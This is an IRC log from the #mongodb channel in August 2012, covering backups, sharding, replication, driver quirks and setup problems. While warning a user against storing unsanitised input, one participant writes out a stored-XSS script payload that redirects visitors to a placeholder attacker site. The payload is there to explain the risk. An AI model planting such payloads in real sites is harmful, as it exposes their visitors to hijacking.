PMXBOT Log file Viewer

Help | Karma | Search:

#mongodb logs for Wednesday the 1st of August, 2012

(Back to #mongodb overview) (Back to channel listing) (Animate logs)
[00:23:05] <y3di> hi guys, I just ran mongodump
[00:23:27] <y3di> and I'd like to test it to make sure it's saved everything properly
[00:23:33] <y3di> how can i go about doing that
[00:30:07] <crudson> y3di: restore it to a different db
[00:35:52] <y3di> so when doing mongodump -> monorestore all your items in the db have different _ids?
[00:36:44] <y3di> so it wouldn't make sense to make _ids user facing at all
[00:37:17] <deoxxa> where does it say that?
[00:37:28] <deoxxa> sounds like you're guessing.
[00:37:30] <deoxxa> stop guessing.
[00:37:46] <crudson> _id doesn't refer to db or collection names
[00:38:52] <y3di> deoxxa: my bad, the mongo docs said mongorestore simply reinserts the data
[00:39:13] <y3di> and since the _id is generated based off of time (among other things) i assumed the _id would change
[01:31:22] <y3di> i get this error when trying to mongorestore
[01:31:24] <y3di> Error creating index production.itemsWed Aug 1 01:30:39 User Assertion: 13111:field not found, expected type 16
[01:31:24] <y3di> assertion: 13111 field not found, expected type 16
[01:32:23] <y3di> i'm having trouble understanding what this is saying to do
[01:32:24] <y3di> http://stackoverflow.com/questions/10712600/mongodump-and-mongorestore-field-not-found
[01:56:18] <y3di> nvm i figured it out i think
[03:32:31] <arthurnn> sup. anyone in there?
[03:32:53] <arthurnn> i `ve got some questions about ShardKeys and queries in Shard nodes
[03:33:59] <arthurnn> i work at 500px . and we start using mongodb a few months ago to store all activities from the site. now we are wondering to start sharding this mongo intance that we have
[03:34:08] <arthurnn> but i need to know if this is the better option
[04:17:41] <jwilliams> what is the right way to do continue on error if dirver is prior to e.g. 2.8.0?
[04:42:27] <deoxxa> jwilliams: define "driver"
[05:56:10] <jwilliams> mongo java driver 2.6.5
[05:56:50] <jwilliams> which has WriteConcern, but only version upper than 2.7.x contains continue on error.
[05:57:32] <jwilliams> so i am wandering how to achieve the same effect with the earlier mongo java driver version.
[07:39:04] <[AD]Turbo> hola
[08:18:10] <shylent> if I create a capped collection with size cap X and create some indexes on it, does index size also get capped by X?
[08:18:18] <shylent> or is it completely independent
[08:24:23] <NodeX> there will be a max index size that wont exceed the capped collction size
[08:24:57] <NodeX> i/e when a document gets purged from the capped collection it will be purged from the index also
[08:40:33] <shylent> Makes sense, thanks
[10:01:25] <circlicious> database has '0' when i fetch it in php i get false, and true for '1' - why is that ?
[10:04:11] <circlicious> somethings are quite weird, i pass in false or true and mongo saves it as string '0' or '1' , whats the reaosn?
[10:04:28] <circlicious> and when i fetch it becomes 'falkse' and 'true' stirngs
[10:05:45] <Rozza> circlicious: jump on the js shell and double check how its stored
[10:05:57] <Rozza> doesnt sound right at all
[10:10:08] <circlicious> in the js shell it shows as '0' and '1'
[10:10:19] <circlicious> "0" and "1" actually
[10:10:23] <circlicious> Rozza: ^
[10:10:49] <Rozza> ok seems that they are coming out right into php land
[10:11:17] <Rozza> if you test creating a new document in php with a boolean value is it saved as expected?
[10:11:38] <Rozza> i.e. it comes out as true / false in js?
[10:11:51] <Rozza> also are you using the latest php driver?
[10:12:12] <circlicious> wait
[10:12:31] <circlicious> 1.2.10 is the mongo driver version
[10:12:50] <circlicious> and how is it coming right in php land ? lets say if it is '0' and '1' in mongo, it comes out as 'true' and 'false - strings
[10:14:25] <circlicious> i could be wrong actually, jQuery is sending string to server not boolean :|
[10:14:48] <circlicious> 'true' gets stored as '1' and on fetch becomes 'true' - pretty funny
[10:17:39] <NodeX> php evaluates 1 as true and zero as false
[10:17:48] <NodeX> (the int's anyway not the strings)
[10:18:55] <Rozza> so circlicious is it a jQuery / js -> php issue ? or in php are you explicitly setting values to True / False
[10:22:34] <circlicious> wait i am checking a lot
[10:22:36] <circlicious> hold please
[10:24:46] <circlicious> ok, nvm the true false, its all my fault
[10:25:08] <circlicious> my jquery code sent '0' '1' as strings and not boolean
[10:25:14] <circlicious> and PHP stored it as it is
[10:25:29] <NodeX> always cast in pHP
[10:25:35] <circlicious> so mongo stored strings, and based on the values i tried to do boolean conditional in JS and things got messed up :/
[10:26:02] <circlicious> ye maybe i should, but i am simply storing the data that i get into DB, not messing with it at all.
[10:26:16] <circlicious> maybe i should tweak my jquery code to properly send 0 and 1 as ints not strings
[10:26:40] <circlicious> or just cast them to int in PHP when printing in HTML's JS code
[10:26:46] <NodeX> you should be sanatising and casting in your PHP
[10:26:57] <circlicious> before save?
[10:27:06] <NodeX> sanitising... it's very dangerous to let unsanitised code into any database
[10:27:33] <circlicious> what kind of sanitizing ? i thought theres no sql injection thingie in mongo, so just storing whatever the user sent was fine in my case.
[10:27:43] <NodeX> LOLOLOL
[10:27:47] <circlicious> :D
[10:27:52] <NodeX> that's the funniest thing I have ever heard
[10:27:58] <circlicious> maybe yeh :D
[10:28:00] <NodeX> what is your app called so I can avoid it¬
[10:28:09] <circlicious> heh :P
[10:28:18] <NodeX> XSS attacks, remote inclusion attacks
[10:28:24] <NodeX> local inclusion attacks
[10:28:25] <circlicious> basically, i am just allowing any user data for the "preferences" part of each record/document
[10:28:59] <circlicious> oh yeh, i didnt think of XSS, lol
[10:29:00] <NodeX> store <script>document.location.href='http://my.hacksite.com/exploitme.php'</script>
[10:29:20] <Guest45545> Hi guys. I have a quick question, I'm a newbie to mongo. When I use mongorestore on a set of bson files created by mongobackup where is the database restored to?
[10:29:21] <NodeX> when your user re-echo's what you saved they leave your site
[10:29:43] <NodeX> it's restored to the database it was dumped from
[10:29:52] <circlicious> actually
[10:29:57] <NodeX> dump/DATABASE_NAME/....
[10:30:11] <circlicious> i am dumping that data as JS object in json_encode
[10:30:17] <Guest45545> NodeX: But I don't see any new generated files in there?
[10:30:18] <circlicious> so i thought i didnt need to care
[10:30:36] <NodeX> circlicious : that's a really bad way of not only thinking but programming in general
[10:30:41] <NodeX> bad -> dangerous
[10:30:52] <circlicious> ok, i will rewrite my code quickly then
[10:31:06] <circlicious> basically i did this
[10:31:06] <Guest45545> NodeX: But I don't see any new generated files in there?/
[10:31:09] <circlicious> 'pref' => $input['pref']
[10:31:16] <Guest45545> Is there no way of regenerating the original .0, .1, .ns files?
[10:31:17] <Guest45545> whoops
[10:31:19] <circlicious> $input['pref'] is an associative arrya passed from client-side
[10:31:34] <NodeX> mongodump
[10:31:57] <circlicious> hm, so now maybe i should mention each key/column and sanitize/intcast? ok
[10:33:21] <NodeX> that's down to your app
[10:33:55] <circlicious> well, i'll do it anyway, nto a big deal
[10:34:10] <circlicious> it'll also help me prevent issues like i had for which i joined now
[10:34:18] <circlicious> also will help me keep track fo what exactly i am storing
[10:34:19] <circlicious> so fine
[10:40:27] <circlicious> ok done, things are better now NodeX
[10:43:15] <neil__g> Some advice, if anyone has a moment: I have a P-S-S replicaset, and due to a run-away import all machines are now sitting at about 90% disk space. I've since deleted the big collection, but Mongo hasn't released the disk space. What's the safest way to free up that disk space? This is in production.
[10:43:54] <Guest45545> NodeX: can you just clarify this for me. If I run mongobackup on my database, can I use mongorestore on the bson files on another server to recreate the database?
[10:55:42] <ankakusu> I have a problem while inserting date time object into mongodb.
[10:55:46] <ankakusu> I'm using java driver.
[10:56:06] <ankakusu> the link for code is as follows:
[10:56:51] <ankakusu> http://pastebin.com/0j5CZBjH
[10:57:27] <ankakusu> after running this code, I check what is inserted into mongodb
[10:58:03] <ankakusu> the field for specific datetime object is as follows:
[10:58:04] <ankakusu> { "_id" : ObjectId("50190afae4b09264a6cbb19e"), "bla" : ISODate("2011-10-02T20:49:19Z") }
[10:58:35] <ankakusu> as it is observed, I entered "2011-10-02T23:49:19Z"
[10:58:50] <circlicious> NodeX: say if you had a field called foo in your documents, that would sometime shave a value and sometimes would not have a value, what would you do when it would not have a value ?
[10:59:03] <circlicious> store foo: '' or do checking in PHP and not store anything for it ?
[10:59:22] <ankakusu> but I get "2011-10-02T20:49:19Z"
[10:59:38] <ankakusu> what is wrong about the code snippet?
[11:04:51] <NodeX> circlicious : it depends how your app want's to deal with it
[11:05:19] <circlicious> i guess if i add foo: '' that would end up consuming lots of megabytes with millions of documents
[11:05:28] <circlicious> so i'll better do checking in php and not save it, should be fast
[11:15:06] <pb8345> hi, does anyone have experience with oracle nosql?
[11:36:58] <NodeX> pb8345 : goto #oracle-nosql
[11:50:46] <jwilliams> is there any lock when doing mongodump?
[11:51:06] <jwilliams> i run parallel 2 mongodump for 2 collections
[11:51:29] <jwilliams> but it seems very slow when compared to the previous round, which only 1 mongdump was running.
[11:51:46] <jwilliams> would it be recommended to run mongodump one at a time?
[12:12:54] <wereHamster> well, they compete for resources. So I would say yes
[12:17:25] <jwilliams> wereHamster: thanks for the explanation. that looks reasonable accounting for why it performs slow.
[12:17:41] <frsk> <
[12:17:46] <frsk> uhm :)
[12:18:09] <jwilliams> stoping one process looks making more progress.
[13:43:58] <addisonj> http://aws.typepad.com/aws/2012/08/fast-forward-provisioned-iops-ebs.html this is quite exciting, predictable performance from EBS? who woulda thought
[14:47:07] <NodeX> anyone know much about PCI complience with MongoDB ?
[14:50:09] <Goopyo> http://stackoverflow.com/questions/4269086/pci-compliance-non-authenticated-db
[15:20:58] <BurtyB> Anyone know how I can prevent "PHP Fatal error: Uncaught exception 'MongoCursorException' with message 'too many attempts to update config, failing' in " I'm assuming it's because it's moving shards around?
[15:50:35] <cwebb_> i am running mongodump and its speed is very slow (4 hours for only 5% with total docs around 120mm). the previous run for another collection didn't take that long.
[15:51:29] <cwebb_> checking mongostat --discover, not many locked % (usually 0%, several times it may be around 10%).
[15:51:49] <cwebb_> iostat -x 1 shows that cpu is usually idle.
[15:52:05] <cwebb_> what other factors or where i may be able to start to check?
[16:05:49] <kali> cwebb_: look for faults in mongostat rather than locks. locks are taken only on writes
[16:09:11] <cwebb_> kali: i just notice there is a higher value (around 50~60) in faults column. i guess that's because there is no index created (it was just for testing bulk write. so index will be created later)
[16:10:03] <nemothekid> Anyone here familiar with the mongodb perl driver? It doesn't seem to encode utf-8 strings properly
[16:10:04] <cwebb_> but the another collection whose index was also not created did not take very long to dump around 60g data to disk.
[16:10:41] <cwebb_> anyway i can reduce the page fault? or to improve this slowness issue?
[16:13:12] <kali> cwebb_: more RAM may help
[16:14:08] <cwebb_> kali: i wish i could have more ram : (
[16:14:27] <kali> is it 50/60 when mongodump is running ?
[16:15:06] <cwebb_> yes. turn of mongodump, the faults drops to 1 ~ 2.
[16:16:11] <scttnlsn> how can i atomically insert a document only if a collection is empty? is this possible with findAndModify?
[16:17:03] <addisonj> cwebb_: we had a weird issue like that, I think we ended up doing a compact and repair then all was okay
[16:18:06] <addisonj> scttnlsn: pretty sure thats a no, but I could be wrong...
[16:19:42] <cwebb_> when running compact, will it have influence e.g. performance if no indexes exist?
[16:19:46] <scttnlsn> addisonj: ok, that's what i though. i've tried all sorts of various things with findAndModify, none of which worked like i wanted
[16:21:03] <lbjay> i'm trying to setup an init.d script for mongo on a centos system that runs using the numactl command. anyone have any examples of this on centos?
[16:21:59] <lbjay> centos doesn't have a start-stop-daemon command, just a shell function called "daemon", so the examples i'm seeing don't work for me
[18:27:55] <SisterArrow> Hiya!
[18:28:54] <SisterArrow> I have a 3 part replica set, and the primay went down, so a secondary took over and data was written to it as it was primary at this point. When i restarted the previous primary(which should be primary aswell) it stays as primary and in the mongo log it says
[18:29:04] <SisterArrow> syncTail: 11000 E11000 duplicate key error index: images.colours.$image_hash_short_1_tpx_code_1 dup key: { : "946aa1fd13", : "16-3907" }, syncing: { ts: Timestamp 1343828841000|6, h: -7441080054905885207, op: "i", ns: "images.colours", o: { _id: ObjectId
[18:29:09] <SisterArrow> it stays as secondary*
[18:29:25] <SisterArrow> Oh, and it does not sync up agains the current primary.
[18:29:27] <SisterArrow> :_(
[18:29:36] <Almindor> hello
[18:29:55] <SisterArrow> Hello Almindor
[18:30:54] <Almindor> we had a repl error (disk overuse) and we want to move a replicaset to another drive (on linux). I have started re-syncing the slave, but it's not even half-done and we can already put the new drives into the machine. Is it possible to copy the data of the slave so it continues syncing from where it stopped?
[18:31:20] <Almindor> note that I will mount the new drive in a way which is transparent for mongo
[18:31:34] <kali> Almindor: i tthink it will start all over again
[18:32:20] <Almindor> kali: so if you start a full re-sync, stop mongod for it and restart it deletes all data and resyncs again?
[18:34:00] <kali> i thikn this is what it will do, yeah
[18:34:06] <kali> not 100% sure
[18:34:39] <Almindor> hmm ok i'll restart the syncing then :D
[18:49:01] <boll> The primary member of my replicaset is showing a globalLock ratio of ~4.3 and consistently has a 600+ currentQueue.writers value
[18:49:15] <boll> could that be reason why I am seeing incredibly slow reads?
[18:49:30] <boll> +the
[19:06:51] <jY> boll: yes
[19:07:52] <boll> the ratio is obviously not 4.3 though, its .43
[19:07:58] <boll> my mistake
[19:08:02] <boll> but ok
[19:08:21] <boll> it's not like I am clobbering the server though
[19:14:16] <TheSteve0> alright I am working in Python and I want to convert my results from BISON to just JSON - I have spent a couple hours searching around and trying different solutions and I can't get it to work
[19:24:45] <TkTech> TheSteve0: Uh, what?
[19:25:21] <TkTech> TheSteve0: You want to dump it to json?
[19:25:33] <TheSteve0> TkTech all my results contain the {u'_id', u'blah blah'….
[19:25:40] <TheSteve0> yeah I just want plain clean JSON
[19:25:53] <TkTech> Right…that's not going to change in JSON...
[19:25:56] <TkTech> But anyways, http://api.mongodb.org/python/2.2.1/api/bson/json_util.html
[19:27:08] <TheSteve0> TkTech: right, I saw that page,
[19:27:23] <TheSteve0> TkTech: so do I put my find query in the place of the ...
[19:27:34] <TkTech> ...what?
[19:27:38] <TkTech> Beginner to Python?
[19:28:39] <TkTech> find() just returns an iterable cursor that you must traverse, .find_one() returns a dict. json.dumps() takes a dict.
[19:29:44] <TheSteve0> TkTech: yup beginner to Python
[19:30:11] <TheSteve0> aahhh I was feeding JSON dump the list
[19:30:13] <dstorrs> I've got a harvester which pulls data from YouTube and inserts it to Mongo. When it first starts, I get excellent insert rates -- 1000+ w/s. Within a few minutes, it drops to ~700 w/s. Then 300. Then 100. Then a few dozen.
[19:30:38] <dstorrs> I've been through my code and I don't see anything to cause this...is there anything on the Mongo side that is a likely culprit?
[19:30:56] <dstorrs> It's 9 machines, each with multiple copies of the harvester proc running in parallel.
[19:31:47] <dstorrs> any ideas at all are much appreciated, because I'm kinda at wits end.
[19:32:59] <dstorrs> oh, and it's a sharded DB if that matters
[19:33:15] <TheSteve0> TkTech: well that is inconvenient - I was hoping I could just "automagically" give the list to a converter and get back nice clean JSON
[19:33:41] <TkTech> I'm confused as to why this is confusing.
[19:33:51] <TkTech> And why you keep describing it as "nice clean JSON"
[19:34:10] <dstorrs> TheSteve0: I didn't see the beginning of your convo, but you can probably do this: db.coll.find(..).forEach(function(d){ printjson(d) })
[19:34:26] <TkTech> my_json = json.dumps({'results': list(db.poopy.find())})
[19:34:36] <TkTech> dstorrs: He's in Python, not the shell.
[19:34:48] <dstorrs> ah. sorry.
[19:35:22] <TheSteve0> TkTech: the u' makes it not JSON that is usable in a client application
[19:35:45] <TheSteve0> TkTech: I didn't say it was confusing I get it - it is just inconvenient - that is all
[19:35:49] <TkTech> What
[19:35:54] <TkTech> That isn't JSON
[19:36:10] <dstorrs> TheSteve0: map your results through a cleaner function that transforms the u' into something else.
[19:36:11] <TkTech> If it has strings prefixed by u it's a unicode string in a python dict
[19:36:20] <TkTech> dstorrs: Shush, he's doing it completely wrong.
[19:36:29] <dstorrs> heh. shushing now.
[19:36:42] <TheSteve0> TkTech: I know that - TkTech let me look at your last statement and try that
[19:36:50] <TheSteve0> I understand the unicode string part
[19:37:01] <TkTech> So you were trying to use a printed python dict as JSON?
[19:37:28] <TheSteve0> TkTech here is what I am saying
[19:37:50] <TheSteve0> TkTech: the list returned from the find call is "basically" JSON
[19:37:55] <TkTech> No
[19:38:00] <TkTech> It is not, nor ever will be.
[19:38:06] <TheSteve0> TkTech: I understand it is not techincally
[19:38:12] <TkTech> No, not technically nor really.
[19:38:35] <TkTech> If you want JSON, import json and turn it into JSON.
[19:39:27] <TheSteve0> TkTech: if I got rid of the u before each string, the string I return is from str(list(find)) is a JSON string - especially since I have no dates in my docuemts
[19:40:18] <TkTech> A poor orphanage burns down every single time you say that.
[19:40:26] <TkTech> Why are you against doing this properly in two lines?
[19:40:36] <TheSteve0> TkTech: LOL
[19:40:47] <TkTech> Do not treat a python dict, which is a python dict, as g'damn JSON.
[19:40:52] <TheSteve0> TkTech: I am not - which is why I said let me go do what you said
[19:41:15] <TheSteve0> TkTech: I was laughing at your Orphange statement
[19:55:43] <nemothekid> So we have about 13 million records in a shared collection to be updated daily in about 4 hours. We've found that the fastest way to do this is to just create a temporary table, do the inserts, then rename & drop. Sadly, you can't rename a shared collection. Obviously our next step was to removes and inserts or just updates. This is _much_ slower. Are there any other options?
[20:03:51] <TheSteve0> TkTech: json.dumps({'results':list(db.parkpoints.find())})
[20:04:04] <TheSteve0> TypeError: ObjectId('501850a974af7ba846cbf74a') is not JSON serializable
[20:04:14] <TheSteve0> TkTech: thanks for your help btw
[20:04:34] <TkTech> TheSteve0: Read the very first link I gave you.
[20:04:35] <TheSteve0> TkTech: so I think this is where we go back to http://api.mongodb.org/python/2.2.1/api/bson/json_util.html
[20:04:39] <TheSteve0> yup
[20:04:41] <TheSteve0> on it
[20:06:36] <TheSteve0> TkTech: I tried import bson - but I get:NameError: name 'json_util' is not defined
[20:07:31] <TheSteve0> TkTech: sorry
[20:07:54] <TkTech> "from bson import json_util"
[20:08:19] <TheSteve0> TkTech: but doesn't "import bson" import everything
[20:08:34] <TheSteve0> import pymongo brings in all the pymongo packages
[20:08:43] <TheSteve0> TkTech: fair enough
[20:09:33] <TheSteve0> TkTech: Booya cashah - it works
[20:09:38] <TheSteve0> TkTech: thanks for your patience
[20:10:05] <TheSteve0> TkTech: any ideas on where I would put this so some other poor newb like me can find it all collected in one place
[20:10:14] <TheSteve0> TkTech: I mean in terms of doc
[20:10:36] <boll> On a not very heavily loaded sharded database, any obvious reasons that a backlog of 2000 or more write operations sit in the operations queue (db.currentOP())
[20:14:23] <EricL> Does adding a replicaset to a sharded environment (ie the shard) distribute reads?
[20:20:02] <timoxley> http://docs.mongodb.org/manual/applications/aggregation/
[20:20:23] <timoxley> link borken due to redirects
[20:20:35] <timoxley> Derick mstearn
[20:22:08] <jgornick> Hey guys, does anyone have any insight into how I can write a map/reduce to produce a list of documents that are in a hierarchal tree structure using the child links method? I need to produce a list where I know the ID of a single document and I need to capture all of it's children as well.
[20:23:37] <Derick> timoxley: hmm?
[20:23:56] <Derick> there are some issues with the website, it's being worked on
[20:24:22] <timoxley> Derick no worries. just a heads up in case everyone was at a barbeque or something
[20:24:38] <Derick> hehe, cheers
[20:26:48] <boll> In a replica set, is there a downside to allowing slave reads?
[20:26:51] <crudson> jgornick: Sounds perfectly reasonable. Do you have example input documents?
[20:27:24] <nofxx> boll, data may took some time to replicate, but it's meant to be used like that
[20:27:59] <nofxx> if you don't read from the slaves you got yourself some expensive backup machine
[20:28:21] <jgornick> crudson: I suppose you could look at the sample for child links @ http://www.mongodb.org/display/DOCS/Trees+in+MongoDB#TreesinMongoDB-ChildLinks
[20:28:58] <nofxx> boll, you can use consistency: :strong in a per connection basis, check your driver
[20:29:04] <jgornick> crudson: Actually, I should get something more concrete to my example.
[20:29:08] <boll> nofxx: I don't read from the secondary, but it's incredibly handy for robustnes and upgrades
[20:29:27] <nofxx> boll (ean) true ... hehe
[20:29:51] <crudson> jgornick: emit(parent_id, {children:[_id]}) and push the children together in reduce
[20:30:50] <boll> nofxx: It takes some work choosing which queries can live with possibly delayed replication
[20:31:01] <boll> especially in a web-ui
[20:40:09] <jgornick> crudson: That will help me get started. Thanks!
[20:40:56] <crudson> jgornick: gl. if you have issues paste some documents and what you are looking to achieve.
[20:41:11] <jgornick> crudson: Sounds good!
[21:07:44] <acidchild> Hello, i added a shard that contains the entire database but i added it as localhost not the IP. how do i change the shard hostname/ip without draining it? because it contains all the data and it's failing to move chunks to the other shard because it's 'localhost' not the IP?
[21:08:00] <acidchild> these are the errors i am getting; http://pastebin.slackadelic.com/p/Ze7Ox045.html
[21:11:40] <emperorcezar> So I'm using mongodb as a mq backend for celery. The program using celery is migrating email. So it's pushing messages into a queue being stored on mongo and them pulling them off and being pushed somewhere else. From my understanding, mongo will just keep growing the db file until I do a repair? My mail size is 2.5 Terrabytes. So I'm concerned about the db becoming huge without repair.
[21:11:57] <emperorcezar> Sorry 1.5 TB
[21:14:58] <TkTech> emperorcezar: While you can use MongoDB as a Queue, it's a really bad usage for such heavy usage.
[21:15:32] <emperorcezar> TkTech: Yea. I was using it because I need to store the messageid and completion flag anyhow
[21:15:44] <emperorcezar> So I needed mongo running anyhow
[21:16:01] <emperorcezar> TkTech: I'm assuming RabbitMQ would work great for this?
[21:16:03] <TkTech> Don't be lazy :)
[21:16:18] <emperorcezar> Lazy is the mark of a good programmer. :)
[21:16:42] <TkTech> Lazy is the mark of a quick programmer who won't be around when his program no longer scales :P
[21:17:09] <TkTech> You could use just about any other backend.
[21:17:16] <TkTech> Redis being an okay candidate
[21:17:17] <emperorcezar> This thing better scale off the bat. There's no light usage. Soon as I turn it on, it's going to hammer.
[21:45:53] <nofxxx> Just to make sure I got it right, repairDB(), on new versions will only release free space to the system, so it's not needed to run that in a timely fashion anymore
[22:13:19] <kingsol> hey all… new to mongodb (literally today) - I've followed the guide in the docs, and have searched the google to find my issue to no avail. It is permission related for sure. I am on fedora. I can run "mongod" as root and it fires up. If i run "service mongod start" I get a fail, says it can't write to the log. I've found posts with similar problem… I've checked the permissions for /var/log, /var/log/monogo/ and the file itself, I've done this f
[22:13:19] <kingsol> /data/db/ as well… at a dead end as I am not a permissions wizard.
[22:15:22] <jY> kingsol: selinux enabled?
[22:16:08] <kingsol> looks...
[22:16:41] <kingsol> jY: yes, targeted
[22:16:50] <kingsol> is that the problem?
[22:16:53] <jY> for temp.. try disabling it
[22:16:56] <jY> setenforce 0
[22:17:00] <jY> then try
[22:17:43] <kingsol> cool… one sec
[22:18:35] <kingsol> already working … starting now...
[22:20:01] <kingsol> jY: so does that mean I need to permanently disable selinux? to be honest, I am not intimate with benefit/issues with selinux other then some high level details
[22:20:36] <jY> or figure out how to tell selinux writing to those logs and binding to that port is ok for the mongo user
[22:21:47] <kingsol> is selinux a "strong benefit" or a "nice-to-have" or is it relative to function/role of the machine
[22:22:34] <jY> depends on your stance on security i guess
[22:22:55] <jY> it makes things like buffer overflows pretty much impossible
[22:23:41] <kingsol> ok… thank you so much… I'll see if I can figure out how to tell selinux to allow mongos user for those files/folders
[22:24:07] <arthurnn> anyone in there. willing to help me out.
[22:24:13] <arthurnn> ?
[22:24:15] <jY> only if you ask a question
[22:24:15] <kingsol> jY: Starting mongod (via systemctl): timed out and failed (this would be the first time start up as mongod user…
[22:24:52] <jY> what happens the 2nd time?
[22:25:07] <arthurnn> i had a collection .. in one mongod server only.. i added that in a shard cluster .. and I set the shard key to a property that is not unique.
[22:25:08] <kingsol> running now
[22:25:24] <arthurnn> is that wrong? or can I have a shard key in a non-unique fied?
[22:25:42] <jY> kingsol: probably timedout waiting for the process to finish creating the init files
[22:26:08] <kingsol> jY: can you "extend" the timeout somehow?
[22:26:25] <jY> kingsol: no idea.. happens to me in mysql the first time.. i just ignore it
[22:29:41] <arthurnn> anyone on that.
[22:29:55] <arthurnn> because i started sharding a pre existent collection that i had.
[22:30:12] <arthurnn> and it looks like that .count() is getting smaller and smaller. any reason for it?
[22:32:22] <kingsol> jY: ok, checked the logs… looks like another perm issue I can track down on google "Unable to acquire lock for lockfilepath: /var/lib/mongo/mongod.lock" checking google
[22:36:45] <arthurnn> if I do a stats() in my collection. it looks like that the count the shard0000 is decreasing but the count in shard0001 is not incresing
[22:36:51] <arthurnn> any reason for that?
[22:57:45] <kingsol> jY: still won't start, fixed the locking issue by simply removing the file and letting it be created again… now it is failing because it says the port is in use
[22:57:54] <kingsol> grrr… getting closer
[23:01:54] <kingsol> jY: interesting… so it is actually starting just fine now, the service start is hanging it seems as though its not getting a successful message from mongod starting… if i tail -f the log, and start with a service mongod start &, then run mongo, I can connect. If i let it sit long enough the process for the service start terminates with a fail
[23:23:04] <kingsol> jY: I gotta run… I appreciate your help!
[23:49:27] <fabiobatalha> Hello guys!
[23:50:03] <fabiobatalha> I'm modeling a schema to store access statistics by year, month and day.
[23:50:38] <fabiobatalha> anybody have a suggestion on how to store those kind of data?
[23:51:38] <fabiobatalha> Considering that I'll use the $inc modifier, I'll not be able to create complex data structures, just a flat structure.